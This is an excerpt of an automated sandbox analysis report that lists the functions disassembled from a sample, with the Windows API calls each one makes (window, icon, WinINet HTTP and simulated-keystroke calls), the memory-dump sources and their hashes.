                                                                                                                                                                                                                                    • Part of subcall function 00997567: GetWindowRect.USER32(?,?), ref: 009975CE
                                                                                                                                                                                                                                    • Part of subcall function 00997567: ScreenToClient.USER32(?,?), ref: 009975F6
                                                                                                                                                                                                                                  • GetDC.USER32 ref: 009D6083
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009D6096
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009D60A4
                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 009D60B9
                                                                                                                                                                                                                                  • ReleaseDC.USER32(?,00000000), ref: 009D60C1
                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009D6152
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                  • String ID: U
                                                                                                                                                                                                                                  • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                  • Opcode ID: a4645c8f731c77a6e56a7945fc28bd7a5d0e18b97323e63fd73bfea595b4c6a8
                                                                                                                                                                                                                                  • Instruction ID: def2f3237141e6048167cbe46af0745a18d9f19c0e22c737b165047e99b0c593
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4645c8f731c77a6e56a7945fc28bd7a5d0e18b97323e63fd73bfea595b4c6a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7571E031504205EFCF25CFA8CC84ABA7BBAFF49320F24866AED555A2A7C7359841DF50
                                                                                                                                                                                                                                  Function 00A2955E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009924B0
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetCursorPos.USER32(?), ref: 009919E1
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: ScreenToClient.USER32(00000000,?), ref: 009919FE
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000001), ref: 00991A23
                                                                                                                                                                                                                                    • Part of subcall function 009919CD: GetAsyncKeyState.USER32(00000002), ref: 00991A3D
                                                                                                                                                                                                                                  • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?), ref: 00A295C7
                                                                                                                                                                                                                                  • ImageList_EndDrag.COMCTL32 ref: 00A295CD
                                                                                                                                                                                                                                  • ReleaseCapture.USER32 ref: 00A295D3
                                                                                                                                                                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00A2966E
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00A29681
                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?), ref: 00A2975B
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                                                                                                  • API String ID: 1924731296-2107944366
                                                                                                                                                                                                                                  • Opcode ID: a98522679c295419097d9e2bc4cb6dbe51e38599e850020426e67cb70af1c7c9
                                                                                                                                                                                                                                  • Instruction ID: dff862d704f8a487c4a3739ada6ba1b43036d186052795fccdd10c7241df692d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a98522679c295419097d9e2bc4cb6dbe51e38599e850020426e67cb70af1c7c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63517C71504310AFDB14EF28DC56FAA77E4FB88714F400A2CF996A72E2DB749909CB52
                                                                                                                                                                                                                                  Function 00A0CC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A0CCB7
                                                                                                                                                                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A0CCDF
                                                                                                                                                                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A0CD0F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00A0CD67
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00A0CD7B
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00A0CD86
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3113390036-3916222277
                                                                                                                                                                                                                                  • Opcode ID: 672afa59c11903d528bab53e9c0c759d5d20b1214ab79cdc4166047bf4b2cfcf
                                                                                                                                                                                                                                  • Instruction ID: f1b067f5a428ff70aeaf92d1896abb77b18b8fb92055ca3df737e3f123f15f92
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 672afa59c11903d528bab53e9c0c759d5d20b1214ab79cdc4166047bf4b2cfcf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6317F71500208AFD731EFA5ED88ABB7FFCEB45750B10462EF44696291DB34ED0A9B60
                                                                                                                                                                                                                                  Function 009FA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,009D55AE,?,?,Bad directive syntax error,00A2DCD0,00000000,00000010,?,?), ref: 009FA236
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,009D55AE,?), ref: 009FA23D
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 009FA301
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                                                  • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                                                  • API String ID: 858772685-4153970271
                                                                                                                                                                                                                                  • Opcode ID: 4750e3c68093a5979d8164f43795a8be686cc252ca1801498f273ab15e0c50ce
                                                                                                                                                                                                                                  • Instruction ID: 21dc16b870262463e26d0fde3b9bad9954dc1baca48fbde0e03b1c80250c89bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4750e3c68093a5979d8164f43795a8be686cc252ca1801498f273ab15e0c50ce
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 23214D7190421EAFCF11EBA4DC0AFFE7B39BF18700F044865F619650A2EB759618DB51
                                                                                                                                                                                                                                  Function 009F29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetParent.USER32 ref: 009F29F8
                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 009F2A0D
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009F2A9A
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                                                  • API String ID: 1290815626-3381328864
                                                                                                                                                                                                                                  • Opcode ID: b30b4d1d9faa56705591dc14e229e4680e3b3d41222c933dc5fa6e7efc7aeed7
                                                                                                                                                                                                                                  • Instruction ID: bf2a9c0b1666859ee0b804f8ca63a41340bac873a6d3ec128ffa0925f6f9db1b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b30b4d1d9faa56705591dc14e229e4680e3b3d41222c933dc5fa6e7efc7aeed7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C11067638830BBAFE246724DC0AFF6379CAF55735B210022FA04E50D2FB65E8055614
                                                                                                                                                                                                                                  Function 00997567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0099758D
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 009975CE
                                                                                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 009975F6
                                                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 0099773A
                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0099775B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1296646539-0
                                                                                                                                                                                                                                  • Opcode ID: dbe63755b2d741e0d61235b4a19365d6b56c51779a10260846745594a812213c
                                                                                                                                                                                                                                  • Instruction ID: 4df39ad40f6b7726217b8600ac2bdf3d25a00e623d56f07bdea91416a00dcf80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbe63755b2d741e0d61235b4a19365d6b56c51779a10260846745594a812213c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BC1373991464ADBDF10CFE8C540BEDF7B5FF18310F14841AE8A5A3250DB38A951DB61
                                                                                                                                                                                                                                  Function 009CD210 Relevance: 13.7, APIs: 9, Instructions: 209COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1282221369-0
                                                                                                                                                                                                                                  • Opcode ID: 3c6d126a265c3a7ce3e8d05cfe0942b24c883354f1cf60984bcbfe02c11887e6
                                                                                                                                                                                                                                  • Instruction ID: 9214a32bc367b4655bc3dc3cd9f7447b927aeff287942e2b5bdbd157332724d4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c6d126a265c3a7ce3e8d05cfe0942b24c883354f1cf60984bcbfe02c11887e6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9613571D06300AFDB25AFB8D881FAE7BB8EF45320F18057EE955A7281E631D9418793
                                                                                                                                                                                                                                  Function 00A25B72 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00A25C24
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00A25C65
                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,?,00000000), ref: 00A25C6B
                                                                                                                                                                                                                                  • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00A25C6F
                                                                                                                                                                                                                                    • Part of subcall function 00A279F2: DeleteObject.GDI32(00000000), ref: 00A27A1E
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A25CAB
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A25CB8
                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00A25CEB
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00A25D25
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00A25D34
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3210457359-0
                                                                                                                                                                                                                                  • Opcode ID: c39a9b182fb4e20bd04d70e79eb35105f412e8b099aded58ca5ea2e63217d62c
                                                                                                                                                                                                                                  • Instruction ID: a298dcd07ac5e963af0a40f9748afc47f8a5ec4e21718ccff355c8a60dbca9b9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c39a9b182fb4e20bd04d70e79eb35105f412e8b099aded58ca5ea2e63217d62c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9519F30E50A29BFEF349BBCEC49B983B61FB04760F244131F914AA1E1D775A981DB40
                                                                                                                                                                                                                                  Function 009913A6 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 009D28D1
                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 009D28EA
                                                                                                                                                                                                                                  • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 009D28FA
                                                                                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 009D2912
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 009D2933
                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009911F5,00000000,00000000,00000000,000000FF,00000000), ref: 009D2942
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 009D295F
                                                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,009911F5,00000000,00000000,00000000,000000FF,00000000), ref: 009D296E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1268354404-0
                                                                                                                                                                                                                                  • Opcode ID: 8e1eb389f7a0ee902d68c9de1f102e951f19c20182517839e74b3b72851cd1d0
                                                                                                                                                                                                                                  • Instruction ID: 32904e95f945ff5d3c04e833656f95c65de3b2908bbd980b2b025bd277e34414
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8e1eb389f7a0ee902d68c9de1f102e951f19c20182517839e74b3b72851cd1d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02518C3064020AAFDF24CF69CC45BAA7BB9FF98710F108529F942972E0D770E982DB50
                                                                                                                                                                                                                                  Function 00A0CB88 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A0CBC7
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00A0CBDA
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00A0CBEE
                                                                                                                                                                                                                                    • Part of subcall function 00A0CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00A0CCB7
                                                                                                                                                                                                                                    • Part of subcall function 00A0CC98: GetLastError.KERNEL32 ref: 00A0CD67
                                                                                                                                                                                                                                    • Part of subcall function 00A0CC98: SetEvent.KERNEL32(?), ref: 00A0CD7B
                                                                                                                                                                                                                                    • Part of subcall function 00A0CC98: InternetCloseHandle.WININET(00000000), ref: 00A0CD86
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 337547030-0
                                                                                                                                                                                                                                  • Opcode ID: 505293a7c7cfa5234be3f6a5627a2d20427ec653ce9af8682e45ecd7800c6c79
                                                                                                                                                                                                                                  • Instruction ID: d483801e62d3842372ce05b934ade0496643b776e09f72c40c10cc4a7b2360ee
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 505293a7c7cfa5234be3f6a5627a2d20427ec653ce9af8682e45ecd7800c6c79
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A931AF71500709AFEB218FB5ED44A7BBBF8FF04320B14462DF85A86651C734E916EBA0
                                                                                                                                                                                                                                  Function 009F2EEF Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 009F43AD
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: GetCurrentThreadId.KERNEL32 ref: 009F43B4
                                                                                                                                                                                                                                    • Part of subcall function 009F4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009F2F00), ref: 009F43BB
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 009F2F0A
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 009F2F28
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 009F2F2C
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 009F2F36
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 009F2F4E
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 009F2F52
                                                                                                                                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 009F2F5C
                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 009F2F70
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 009F2F74
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2014098862-0
